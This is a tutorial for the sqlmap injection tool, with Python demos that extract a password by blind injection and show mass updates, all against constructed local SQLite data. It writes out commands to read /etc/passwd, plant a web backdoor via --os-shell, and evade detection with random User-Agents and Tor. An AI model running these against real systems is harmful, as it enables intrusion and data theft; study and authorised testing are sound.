sqlmap

Verbose Level (-v)

Each level includes everything printed by the lower levels:

  • 0: Python tracebacks, error and critical messages only

  • 1: adds informational and warning messages (default)

  • 2: adds debug messages

  • 3: adds the payloads injected

  • 4: adds the HTTP requests sent

  • 5: adds the HTTP response headers

  • 6: adds the HTTP response page content

Level 3 is the useful one when a payload is being blocked or mangled: you see exactly what was sent instead of guessing.

Database Connection (-d)

Connect directly to a database server with credentials (MySQL, Oracle, Microsoft SQL Server, PostgreSQL, ...), naming the database at the end of the URI:

sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

or to a file-based database (SQLite, Microsoft Access, Firebird, ...), giving the path to the file:

sqlmap -d DBMS://DATABASE_FILEPATH

Direct connections need the matching Python driver installed (for example pymysql for MySQL or psycopg2 for PostgreSQL); sqlmap tells you which one is missing.

GET (-u)

The switches used throughout this page: -f fingerprints the DBMS, --banner fetches its version banner, --dbs lists the databases and --users lists the DBMS user accounts.

sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users

POST (--data)

sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users

Load Request from a File (-r) and Cookie (--cookie)

Save the raw HTTP request (for example from Burp) to a file and sqlmap takes the method, URL, headers, cookies and body from it, so authenticated and POST targets need no extra switches:

sqlmap -r <request_from_burp>

or keep -u and pass the session cookie by hand:

sqlmap -u <url> --cookie "<cookie_name>=<cookie_value>"

User-Agent (--user-agent)

By default sqlmap sends a User-Agent header of the form sqlmap/1.0-dev... that names the tool, which WAF and IDS signatures match trivially. Specify your own User-Agent:

sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users

or let sqlmap pick a real browser User-Agent at random from its bundled list:

sqlmap -u <url> --random-agent -f --banner --dbs --users

Level (--level)

  • --level=1: default; tests only the GET and POST parameters

  • --level=2: adds the HTTP Cookie header values

  • --level=3: adds the HTTP User-Agent and Referer header values

  • --level=4: adds more payloads and boundaries per parameter (no new injection points)

  • --level=5: adds the HTTP Host header value and the full payload set

Every level up means more requests per parameter, so raise it only once the default has failed. Note that -p bypasses the level: a parameter named with -p is tested whatever the level is, so once you know the injection point, -p <parameter> keeps the scan focused, quieter and deeper than blindly raising --level.

Risk (--risk)

  • --risk=1: (default) innocuous injections only

  • --risk=2: adds heavy query time-based injections, which can load or stall the DBMS

  • --risk=3: adds OR-based boolean injections; if the injectable parameter lands in the WHERE clause of an UPDATE or DELETE, OR 1=1 makes the condition true for every row in the table
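To see why risk 3 is destructive rather than just noisy, here is an added example (not from the page or from sqlmap) that replays both payload styles against a constructed in-memory SQLite table through a hypothetical injectable UPDATE endpoint and counts the rows each one touches:

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the target's users table.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, active INTEGER);
        INSERT INTO users VALUES (1, 'alice', 1), (2, 'bob', 1), (3, 'carol', 1);
    """)
    return con


def rows_affected(id_param: str) -> int:
    """Stand-in for a hypothetical deactivate.php?id=...: the parameter is
    concatenated straight into an UPDATE (deliberately injectable). Returns
    how many rows the statement touched, i.e. the collateral damage."""
    con = build_db()  # fresh table for every payload so counts are comparable
    cur = con.execute(f"UPDATE users SET active = 0 WHERE id = {id_param}")
    con.commit()
    return cur.rowcount


# Boolean-based payloads of the kind sqlmap sends at each risk level.
AND_TRUE = "1 AND 1=1"   # risk 1: WHERE id = 1 AND 1=1  -> still only row 1
AND_FALSE = "1 AND 1=2"  # risk 1: WHERE id = 1 AND 1=2  -> no rows
OR_TRUE = "1 OR 1=1"     # risk 3: WHERE id = 1 OR 1=1   -> every row

if __name__ == "__main__":
    for payload in ("1", AND_TRUE, AND_FALSE, OR_TRUE):
        print(f"{payload!r:14} -> {rows_affected(payload)} row(s) updated")
```

The AND-based payloads never widen the original WHERE clause, which is why they are safe at risk 1; the OR-based one rewrites it into a tautology, and on a write statement that is a mass update you cannot undo from sqlmap.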

Proxy (--proxy) and Tor (--tor)

Proxy (for example Burp on http://127.0.0.1:8080, so every request sqlmap sends can be inspected and replayed):

sqlmap --proxy "http://<proxy_host>:<proxy_port>" -u <url> -f --banner --dbs --users

Tor (needs a local Tor client; --check-tor makes sqlmap verify that traffic really leaves through Tor before it starts):

sqlmap --tor --check-tor -u <url> -f --banner --dbs --users

Blind SQLi (--string, --not-string)

For boolean-based blind injection sqlmap must tell a "true" page from a "false" page. It usually finds the difference itself, but on dynamic pages you can pin it down:

  • Pass to --string a string that is always present in the True response page

  • Pass to --not-string a string that is always present in the False response page

(--regexp and --code do the same with a regular expression or an HTTP status code.)
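What sqlmap automates behind those two switches, as an added example that is not part of the page or of sqlmap itself: a hypothetical vuln.php stand-in backed by a constructed in-memory SQLite database leaks only a fixed "found" or "not found" message, and the code uses the two marker strings as a true/false oracle to binary-search a secret out of another table one character at a time.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the target's database.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'Widget'), (2, 'Gadget');
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!');
    """)
    return con


CON = build_db()
REQUESTS = 0  # how many "HTTP requests" the extraction needed


def vulnerable_page(id_param: str) -> str:
    """Stand-in for vuln.php?id=...: the parameter is concatenated into the
    query (deliberately injectable) and only a fixed message comes back."""
    global REQUESTS
    REQUESTS += 1
    sql = f"SELECT name FROM products WHERE id = {id_param}"
    try:
        rows = CON.execute(sql).fetchall()
    except sqlite3.Error:
        return "<html><body>Database error</body></html>"
    if rows:
        return f"<html><body>Product found: {rows[0][0]}</body></html>"
    return "<html><body>No product matches your request</body></html>"


# The markers you would hand to sqlmap as
# --string="Product found" and --not-string="No product matches".
TRUE_MARKER = "Product found"
FALSE_MARKER = "No product matches"


def oracle(condition: str) -> bool:
    """One boolean-based blind probe: inject 'AND (<condition>)' and decide
    true/false from the two markers, as sqlmap does with --string/--not-string."""
    body = vulnerable_page(f"1 AND ({condition})")
    if TRUE_MARKER in body:
        return True
    if FALSE_MARKER in body:
        return False
    raise RuntimeError("neither marker found: page is unstable or the query errored")


def _search(probe: str, lo: int, hi: int) -> int:
    """probe is a condition template 'x > {}' that is monotone in its argument;
    binary-search [lo, hi] for x, i.e. the smallest v for which 'x > v' is false."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(probe.format(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(subquery: str) -> str:
    """Dump the single string returned by `subquery` one character at a time.
    SQLite's length()/substr()/unicode() are used here; on MySQL sqlmap would
    swap in LENGTH()/SUBSTRING()/ORD() for the same job."""
    length = _search(f"length(({subquery})) > {{}}", 0, 64)
    chars = []
    for pos in range(1, length + 1):
        code = _search(f"unicode(substr(({subquery}), {pos}, 1)) > {{}}", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def request_count() -> int:
    return REQUESTS


if __name__ == "__main__":
    secret = extract("SELECT password FROM users WHERE name = 'admin'")
    print(f"extracted {secret!r} in {request_count()} requests")
```

The request count is the point of the binary search: about seven probes per character instead of up to 95, which is also why boolean-based blind extraction is so visible in web logs as a burst of near-identical requests differing only in a number.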

Privilege Enumeration (--is-dba)

Determine whether the current DBMS user is a database administrator (required for most of the file and OS-level features below); --current-user and --privileges give the account name and its exact privilege set:

sqlmap -u <url> --is-dba --current-user --privileges

Download/Upload (--file-read/--file-write/--file-dest)

Read a file from the file system of the database server (on MySQL this needs the FILE privilege and a path allowed by secure_file_priv; on PostgreSQL, superuser):

sqlmap -u <url> --file-read /etc/passwd

Write a local file to the database server (on MySQL via INTO DUMPFILE, so --file-dest must be a path the DBMS process can write):

sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>

Remember that both paths are on the database host, not necessarily the web server: when the two are separate machines, a file written into "the web root" never becomes reachable over HTTP.

RCE (--os-shell)

For a web application backed by MySQL or PostgreSQL, --os-shell works only when all of the following hold:

  1. The DBMS user can write files (the FILE privilege on MySQL, not blocked by secure_file_priv) into a directory the web server serves

  2. The web root is at the default path for the detected OS and web server, or you supply the real one when sqlmap asks

  3. PHP magic_quotes_gpc is disabled, so the quotes in the stager payload are not escaped (legacy PHP only; the directive was removed in PHP 5.4)

sqlmap -u <url> --os-shell

Behind the scenes, sqlmap writes a small file stager (an upload script) into the web root through the injection, uses it to upload a web backdoor, and then runs your commands through that backdoor. Both files stay on the target until you remove them.

With a direct connection (-d) to MySQL or PostgreSQL, sqlmap takes a different route: it loads a user-defined function library (sys_exec()/sys_eval() from lib_mysqludf_sys) into the DBMS and executes commands through it, which needs DBA privileges and a writable plugin directory. For example:

sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell
